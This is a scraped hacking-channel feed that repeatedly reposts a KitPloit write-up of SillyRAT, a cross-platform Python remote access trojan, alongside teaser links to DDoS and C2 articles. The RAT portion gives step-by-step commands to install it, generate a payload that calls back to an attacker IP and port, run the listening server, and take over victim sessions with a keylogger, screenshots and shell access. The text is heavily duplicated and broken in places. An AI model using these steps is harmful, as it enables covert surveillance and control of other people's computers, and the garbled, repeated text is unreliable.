SillyRAT - A Cross Platform Multifunctional (Windows/Linux/Mac) RAT
http://www.kitploit.com/2021/11/sillyrat-cross-platform-multifunctional.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2021/11/sillyrat-cross-platform-multifunctional.html
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Kitploit – Maintenance in Progress
Kitploit is temporarily under maintenance. We’ll be back shortly with improvements.
A Cross Platform (https://www.kitploit.com/search/label/Cross%20Platform) multifunctional (Windows/Linux/Mac) RAT.
Getting Started
Description
A cross platform RAT written in pure Python. The RAT accept commands alongside arguments to either perform as the server who accepts connections or to perform as the client/target who establish connections to the server. The generate command uses the module pyinstaller to compile the actual payload (https://www.kitploit.com/search/label/Payload) code. So, in order to generate payload file for your respective platform, you need to be on that platform while generating the file. Moreover, you can directly get the source file as well.
Features
Built-in Shell for command executionDumping System Information including drives and ramsScreenshot module. Captures screenshot (https://www.kitploit.com/search/label/Screenshot) of client (https://www.kitploit.com/search/label/Client) screen.Connection Loop (Will continue on connecting to server)Currently, it uses BASE64 encoding. Pure PythonCross Platform. (Tested on Linux. Errors are accepted)Source File included for testingPython 3
To be expected in future
Stealth ExecutionEncryptionStoring Sessions from last attemptPushing Notifications when a client connects
Installation
The tool is tested on Parrot OS with Python 3.8. Follow the steps for installation:$ git clone https://github.com/hash3liZer/SillyRAT.git
$ cd SillyRAT/
$ pip3 install -r requirements.txt
Documentation
Generating Payload
You can get the payload file in two ways:Source FileCompiled FileThe source file is to remain same on all platforms. So, you can generate it on one platform and use it on the other. Getting the source file: $ python3 server.py generate --address 134.276.92.1 --port 2999 --output /tmp/payload.py --source
The compiled version has to generated on the respective platform. For example, you can't generate an .exe file on Linux. You specifically have to be on Windows. The tool is still under testing. So, all kinds of errors are accepted. Make sure to open an issue though. Generating the Compiled Version for Linux:$ python3 server.py generate --address 134.276.92.1 --port 2999 --output /tmp/filer
___________________________
@hacking_Attack
@Hacking_Video
Getting Started
Description
A cross platform RAT written in pure Python. The RAT accept commands alongside arguments to either perform as the server who accepts connections or to perform as the client/target who establish connections to the server. The generate command uses the module pyinstaller to compile the actual payload (https://www.kitploit.com/search/label/Payload) code. So, in order to generate payload file for your respective platform, you need to be on that platform while generating the file. Moreover, you can directly get the source file as well.
Features
Built-in Shell for command executionDumping System Information including drives and ramsScreenshot module. Captures screenshot (https://www.kitploit.com/search/label/Screenshot) of client (https://www.kitploit.com/search/label/Client) screen.Connection Loop (Will continue on connecting to server)Currently, it uses BASE64 encoding. Pure PythonCross Platform. (Tested on Linux. Errors are accepted)Source File included for testingPython 3
To be expected in future
Stealth ExecutionEncryptionStoring Sessions from last attemptPushing Notifications when a client connects
Installation
The tool is tested on Parrot OS with Python 3.8. Follow the steps for installation:$ git clone https://github.com/hash3liZer/SillyRAT.git
$ cd SillyRAT/
$ pip3 install -r requirements.txt
Documentation
Generating Payload
You can get the payload file in two ways:Source FileCompiled FileThe source file is to remain same on all platforms. So, you can generate it on one platform and use it on the other. Getting the source file: $ python3 server.py generate --address 134.276.92.1 --port 2999 --output /tmp/payload.py --source
The compiled version has to generated on the respective platform. For example, you can't generate an .exe file on Linux. You specifically have to be on Windows. The tool is still under testing. So, all kinds of errors are accepted. Make sure to open an issue though. Generating the Compiled Version for Linux:$ python3 server.py generate --address 134.276.92.1 --port 2999 --output /tmp/filer
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Leading source of security tools, hacking tools, cybersecurity and network security. Learn about new tools and updates in one place.
Replace your IP Address and Port on above commands.
Running Server
The server must be executed on Linux. You can buy a VPS or Cloud Server for connections. For the record, the server doesn't store any session from last run. So, all the progress will lost once the server application gets terminated. Running your server:$ python3 sillyrat.py bind --address 0.0.0.0 --port 2999
Connections
All the connections will be listed under sessions command:$ sessions
___________________________
@hacking_Attack
@Hacking_Video
Running Server
The server must be executed on Linux. You can buy a VPS or Cloud Server for connections. For the record, the server doesn't store any session from last run. So, all the progress will lost once the server application gets terminated. Running your server:$ python3 sillyrat.py bind --address 0.0.0.0 --port 2999
Connections
All the connections will be listed under sessions command:$ sessions
___________________________
@hacking_Attack
@Hacking_Video
You can connect to you target session with connect command and launch one of available commands:keylogger on $ keylogger dump $ screenshot ">$ connect ID
$ keylogger on
$ keylogger dump
$ screenshot
___________________________
@hacking_Attack
@Hacking_Video
$ keylogger on
$ keylogger dump
$ screenshot
___________________________
@hacking_Attack
@Hacking_Video
Help
Get a list of available commands:$ help
Help on a Specific Command:$ help COMMAND
Support
Twitter: @hash3liZer (https://twitter.com/hash3liZer)
Discord: TheFlash2k#0407
Download SillyRAT (https://github.com/hash3liZer/SillyRAT)
___________________________
@hacking_Attack
@Hacking_Video
Get a list of available commands:$ help
Help on a Specific Command:$ help COMMAND
Support
Twitter: @hash3liZer (https://twitter.com/hash3liZer)
Discord: TheFlash2k#0407
Download SillyRAT (https://github.com/hash3liZer/SillyRAT)
___________________________
@hacking_Attack
@Hacking_Video
Twitter
Shameer Kashif 🇵🇰 (@hash3liZer) | Twitter
The latest Tweets from Shameer Kashif 🇵🇰 (@hash3liZer). Freelancer 👀 | Part Time Trader 📈 | Python 🐍 | Javascript | Bug Bounty | CTF Player. Pakistan
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
What Exactly is A DDos Attack? And How Does it Work?
https://cdn-images-1.medium.com/max/1024/1*KorqCJYmaK5JEdCcTRFB3Q.jpeg
What is a DDOS Attack?
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
What Exactly is A DDos Attack? And How Does it Work?
https://cdn-images-1.medium.com/max/1024/1*KorqCJYmaK5JEdCcTRFB3Q.jpeg
What is a DDOS Attack?
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
What Exactly is A DDos Attack? And How Does it Work?
What is a DDOS Attack?
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Offensive Security: Insanity Hosting Walkthrough
https://cdn-images-1.medium.com/max/788/1*iGeNeZF4UuIDgQIYsjPs9w.png
This is a walkthrough of Insanity Hosting from the offensive security playground. Let us see how we can compromise this machine.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Offensive Security: Insanity Hosting Walkthrough
https://cdn-images-1.medium.com/max/788/1*iGeNeZF4UuIDgQIYsjPs9w.png
This is a walkthrough of Insanity Hosting from the offensive security playground. Let us see how we can compromise this machine.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Offensive Security: Insanity Hosting Walkthrough
This is a walkthrough of Insanity Hosting from the offensive security playground. Let us see how we can compromise this machine.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
TryHackMe : Pickle Rick Walkthrough
https://cdn-images-1.medium.com/max/600/1*lq__TS2hUnWjsiV7ByIsfQ.png
ajosmanpratama.medium.com
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
TryHackMe : Pickle Rick Walkthrough
https://cdn-images-1.medium.com/max/600/1*lq__TS2hUnWjsiV7ByIsfQ.png
ajosmanpratama.medium.com
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
TryHackMe : Pickle Rick Walkthrough
ajosmanpratama.medium.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Getting Started with Covenant C2 for Red Teaming
https://cdn-images-1.medium.com/max/1600/0*QpsxQmOMCob8xFHM.png
Command and Control is part of Red Teaming tactic according to Mitre ATT&CK framework.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Getting Started with Covenant C2 for Red Teaming
https://cdn-images-1.medium.com/max/1600/0*QpsxQmOMCob8xFHM.png
Command and Control is part of Red Teaming tactic according to Mitre ATT&CK framework.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Getting Started with Covenant C2 for Red Teaming
Command and Control is part of Red Teaming tactic according to Mitre ATT&CK framework. C2 is very helpful for maintaining persistent access…
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Your Fingerprint Can Be Hacked For $5. Here’s How. - Kraken Blog
https://external-preview.redd.it/e-nKRB22hX0CHwxwHMToanOp_lp6MHH3qrKDu_js3Ew.jpg?width=640&crop=smart&auto=webp&s=ad4776b8025a8970e9907c3e2d501cb6403f0edd submitted by /u/zoggy90
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Your Fingerprint Can Be Hacked For $5. Here’s How. - Kraken Blog
https://external-preview.redd.it/e-nKRB22hX0CHwxwHMToanOp_lp6MHH3qrKDu_js3Ew.jpg?width=640&crop=smart&auto=webp&s=ad4776b8025a8970e9907c3e2d501cb6403f0edd submitted by /u/zoggy90
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Your Fingerprint Can Be Hacked For $5. Here’s How. - Kraken Blog
Posted in r/hacking by u/zoggy90 • 354 points and 30 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
SillyRAT - A Cross Platform Multifunctional (Windows/Linux/Mac) RAT
https://blogger.googleusercontent.com/img/a/AVvXsEjpsz9f0QdolzGmV7UsNK9StvNTJSqzSnd8fcl40mfahIWBTXnp8w07f49p4iLEvOu8f0VZo0QLC9rYsCMkT0asIs2VUh5mcrn9n7t9SkQ8-Xhbfd_R18OMXa7rfyZ9Gqpt4gmVfisMkwi5joD3sitDLGDvBpU5UCS4MAMEJwFBACu7HxKKDUfGYDRYsg=w640-h314 A Cross Platform multifunctional (Windows/Linux/Mac) RAT.Getting StartedDescriptionA cross platform RAT written in pure Python. The RAT accept commands alongside arguments to either perform as the server who accepts connections or to perform as the client/target who establish connections to the server. The generate command uses the module pyinstaller to compile the actual payload code. So, in order to generate payload file for your respective platform, you need to be on that platform while generating the file. Moreover, you can directly get the source file as well. Features* Built-in Shell for command execution
* Dumping System Information including drives and rams
* Screenshot module. Captures screenshot of client screen.
* Connection Loop (Will continue on connecting to server)
* Currently, it uses BASE64 encoding.
* Pure Python
* Cross Platform. (Tested on Linux. Errors are accepted)
* Source File included for testing
* Python 3 To be expected in future* Stealth Execution
* Encryption
* Storing Sessions from last attempt
* Pushing Notifications when a client connects InstallationThe tool is tested on Parrot OS with Python 3.8. Follow the steps for installation:
* Source File
* Compiled File
The source file is to remain same on all platforms. So, you can generate it on one platform and use it on the other. Getting the source file:
keylogger on $ keylogger dump $ screenshot ">
___________________________
@hacking_Attack
@Hacking_Video
SillyRAT - A Cross Platform Multifunctional (Windows/Linux/Mac) RAT
https://blogger.googleusercontent.com/img/a/AVvXsEjpsz9f0QdolzGmV7UsNK9StvNTJSqzSnd8fcl40mfahIWBTXnp8w07f49p4iLEvOu8f0VZo0QLC9rYsCMkT0asIs2VUh5mcrn9n7t9SkQ8-Xhbfd_R18OMXa7rfyZ9Gqpt4gmVfisMkwi5joD3sitDLGDvBpU5UCS4MAMEJwFBACu7HxKKDUfGYDRYsg=w640-h314 A Cross Platform multifunctional (Windows/Linux/Mac) RAT.Getting StartedDescriptionA cross platform RAT written in pure Python. The RAT accept commands alongside arguments to either perform as the server who accepts connections or to perform as the client/target who establish connections to the server. The generate command uses the module pyinstaller to compile the actual payload code. So, in order to generate payload file for your respective platform, you need to be on that platform while generating the file. Moreover, you can directly get the source file as well. Features* Built-in Shell for command execution
* Dumping System Information including drives and rams
* Screenshot module. Captures screenshot of client screen.
* Connection Loop (Will continue on connecting to server)
* Currently, it uses BASE64 encoding.
* Pure Python
* Cross Platform. (Tested on Linux. Errors are accepted)
* Source File included for testing
* Python 3 To be expected in future* Stealth Execution
* Encryption
* Storing Sessions from last attempt
* Pushing Notifications when a client connects InstallationThe tool is tested on Parrot OS with Python 3.8. Follow the steps for installation:
$ git clone https://github.com/hash3liZer/SillyRAT.git
$ cd SillyRAT/
$ pip3 install -r requirements.txt DocumentationGenerating PayloadYou can get the payload file in two ways:* Source File
* Compiled File
The source file is to remain same on all platforms. So, you can generate it on one platform and use it on the other. Getting the source file:
$ python3 server.py generate --address 134.276.92.1 --port 2999 --output /tmp/payload.py --source The compiled version has to generated on the respective platform. For example, you can't generate an .exe file on Linux. You specifically have to be on Windows. The tool is still under testing. So, all kinds of errors are accepted. Make sure to open an issue though. Generating the Compiled Version for Linux: $ python3 server.py generate --address 134.276.92.1 --port 2999 --output /tmp/filer https://blogger.googleusercontent.com/img/a/AVvXsEgb8Scr-dE0nAgy5Vghmc1jmhAXX0BTF8bHKJx_XU8A2hsjHVOdbQVZWP6LBw9OV1_Tz1B9Ocl56fdyivqBiXdTK7jiLf2GI0bUJ5vnFcFzpxpXDPj4zpefYzAavytipr5ikbCOSVx_UYxWo9FGhu3ejblWzFEOOMHAPqU2npgNmwdASiQw9TB5tcvkXA=w640-h328 Replace your IP Address and Port on above commands. Running ServerThe server must be executed on Linux. You can buy a VPS or Cloud Server for connections. For the record, the server doesn't store any session from last run. So, all the progress will lost once the server application gets terminated. Running your server: $ python3 sillyrat.py bind --address 0.0.0.0 --port 2999 ConnectionsAll the connections will be listed under sessions command: $ sessions https://blogger.googleusercontent.com/img/a/AVvXsEjItTcUamzdomH_e5tZCU4n1zDROGlmDquYZz4BMy4k6_JlEiMWHIlwpnvX5kr3_noMtLUr0vE7-2raPYU0_UR10XsNm_UNCJ12sdHxggw2qHR8D6ywG4e3MmAwN-GOzl5l5bPjfP2ZXzeQ4XAk1v4i8zjEPiTd69j0-gf_2U0ZkGK3H4gtqgZSaKI57w=w640-h316 You can connect to you target session with connect command and launch one of available commands:keylogger on $ keylogger dump $ screenshot ">
$ connect ID
$ keylogger on
$ keylogger dump
$ screenshot https://blogger.googleusercontent.com/img/a/AVvXsEhr-arAFh5s8xFhht98sdy8cCaD7A3UnrGFO6LGt6mLhuAG3GcbliRF-DqeYq1Qv0zcgu0qZe61Mr-epoGTrhGM5hD2wDPDLSI21Mz_uCmYFn6ZdO9Va0ghH4ewzEs0mjcbpYtKY9-Xdf[...]___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Kitploit – Maintenance in Progress
Kitploit is temporarily under maintenance. We’ll be back shortly with improvements.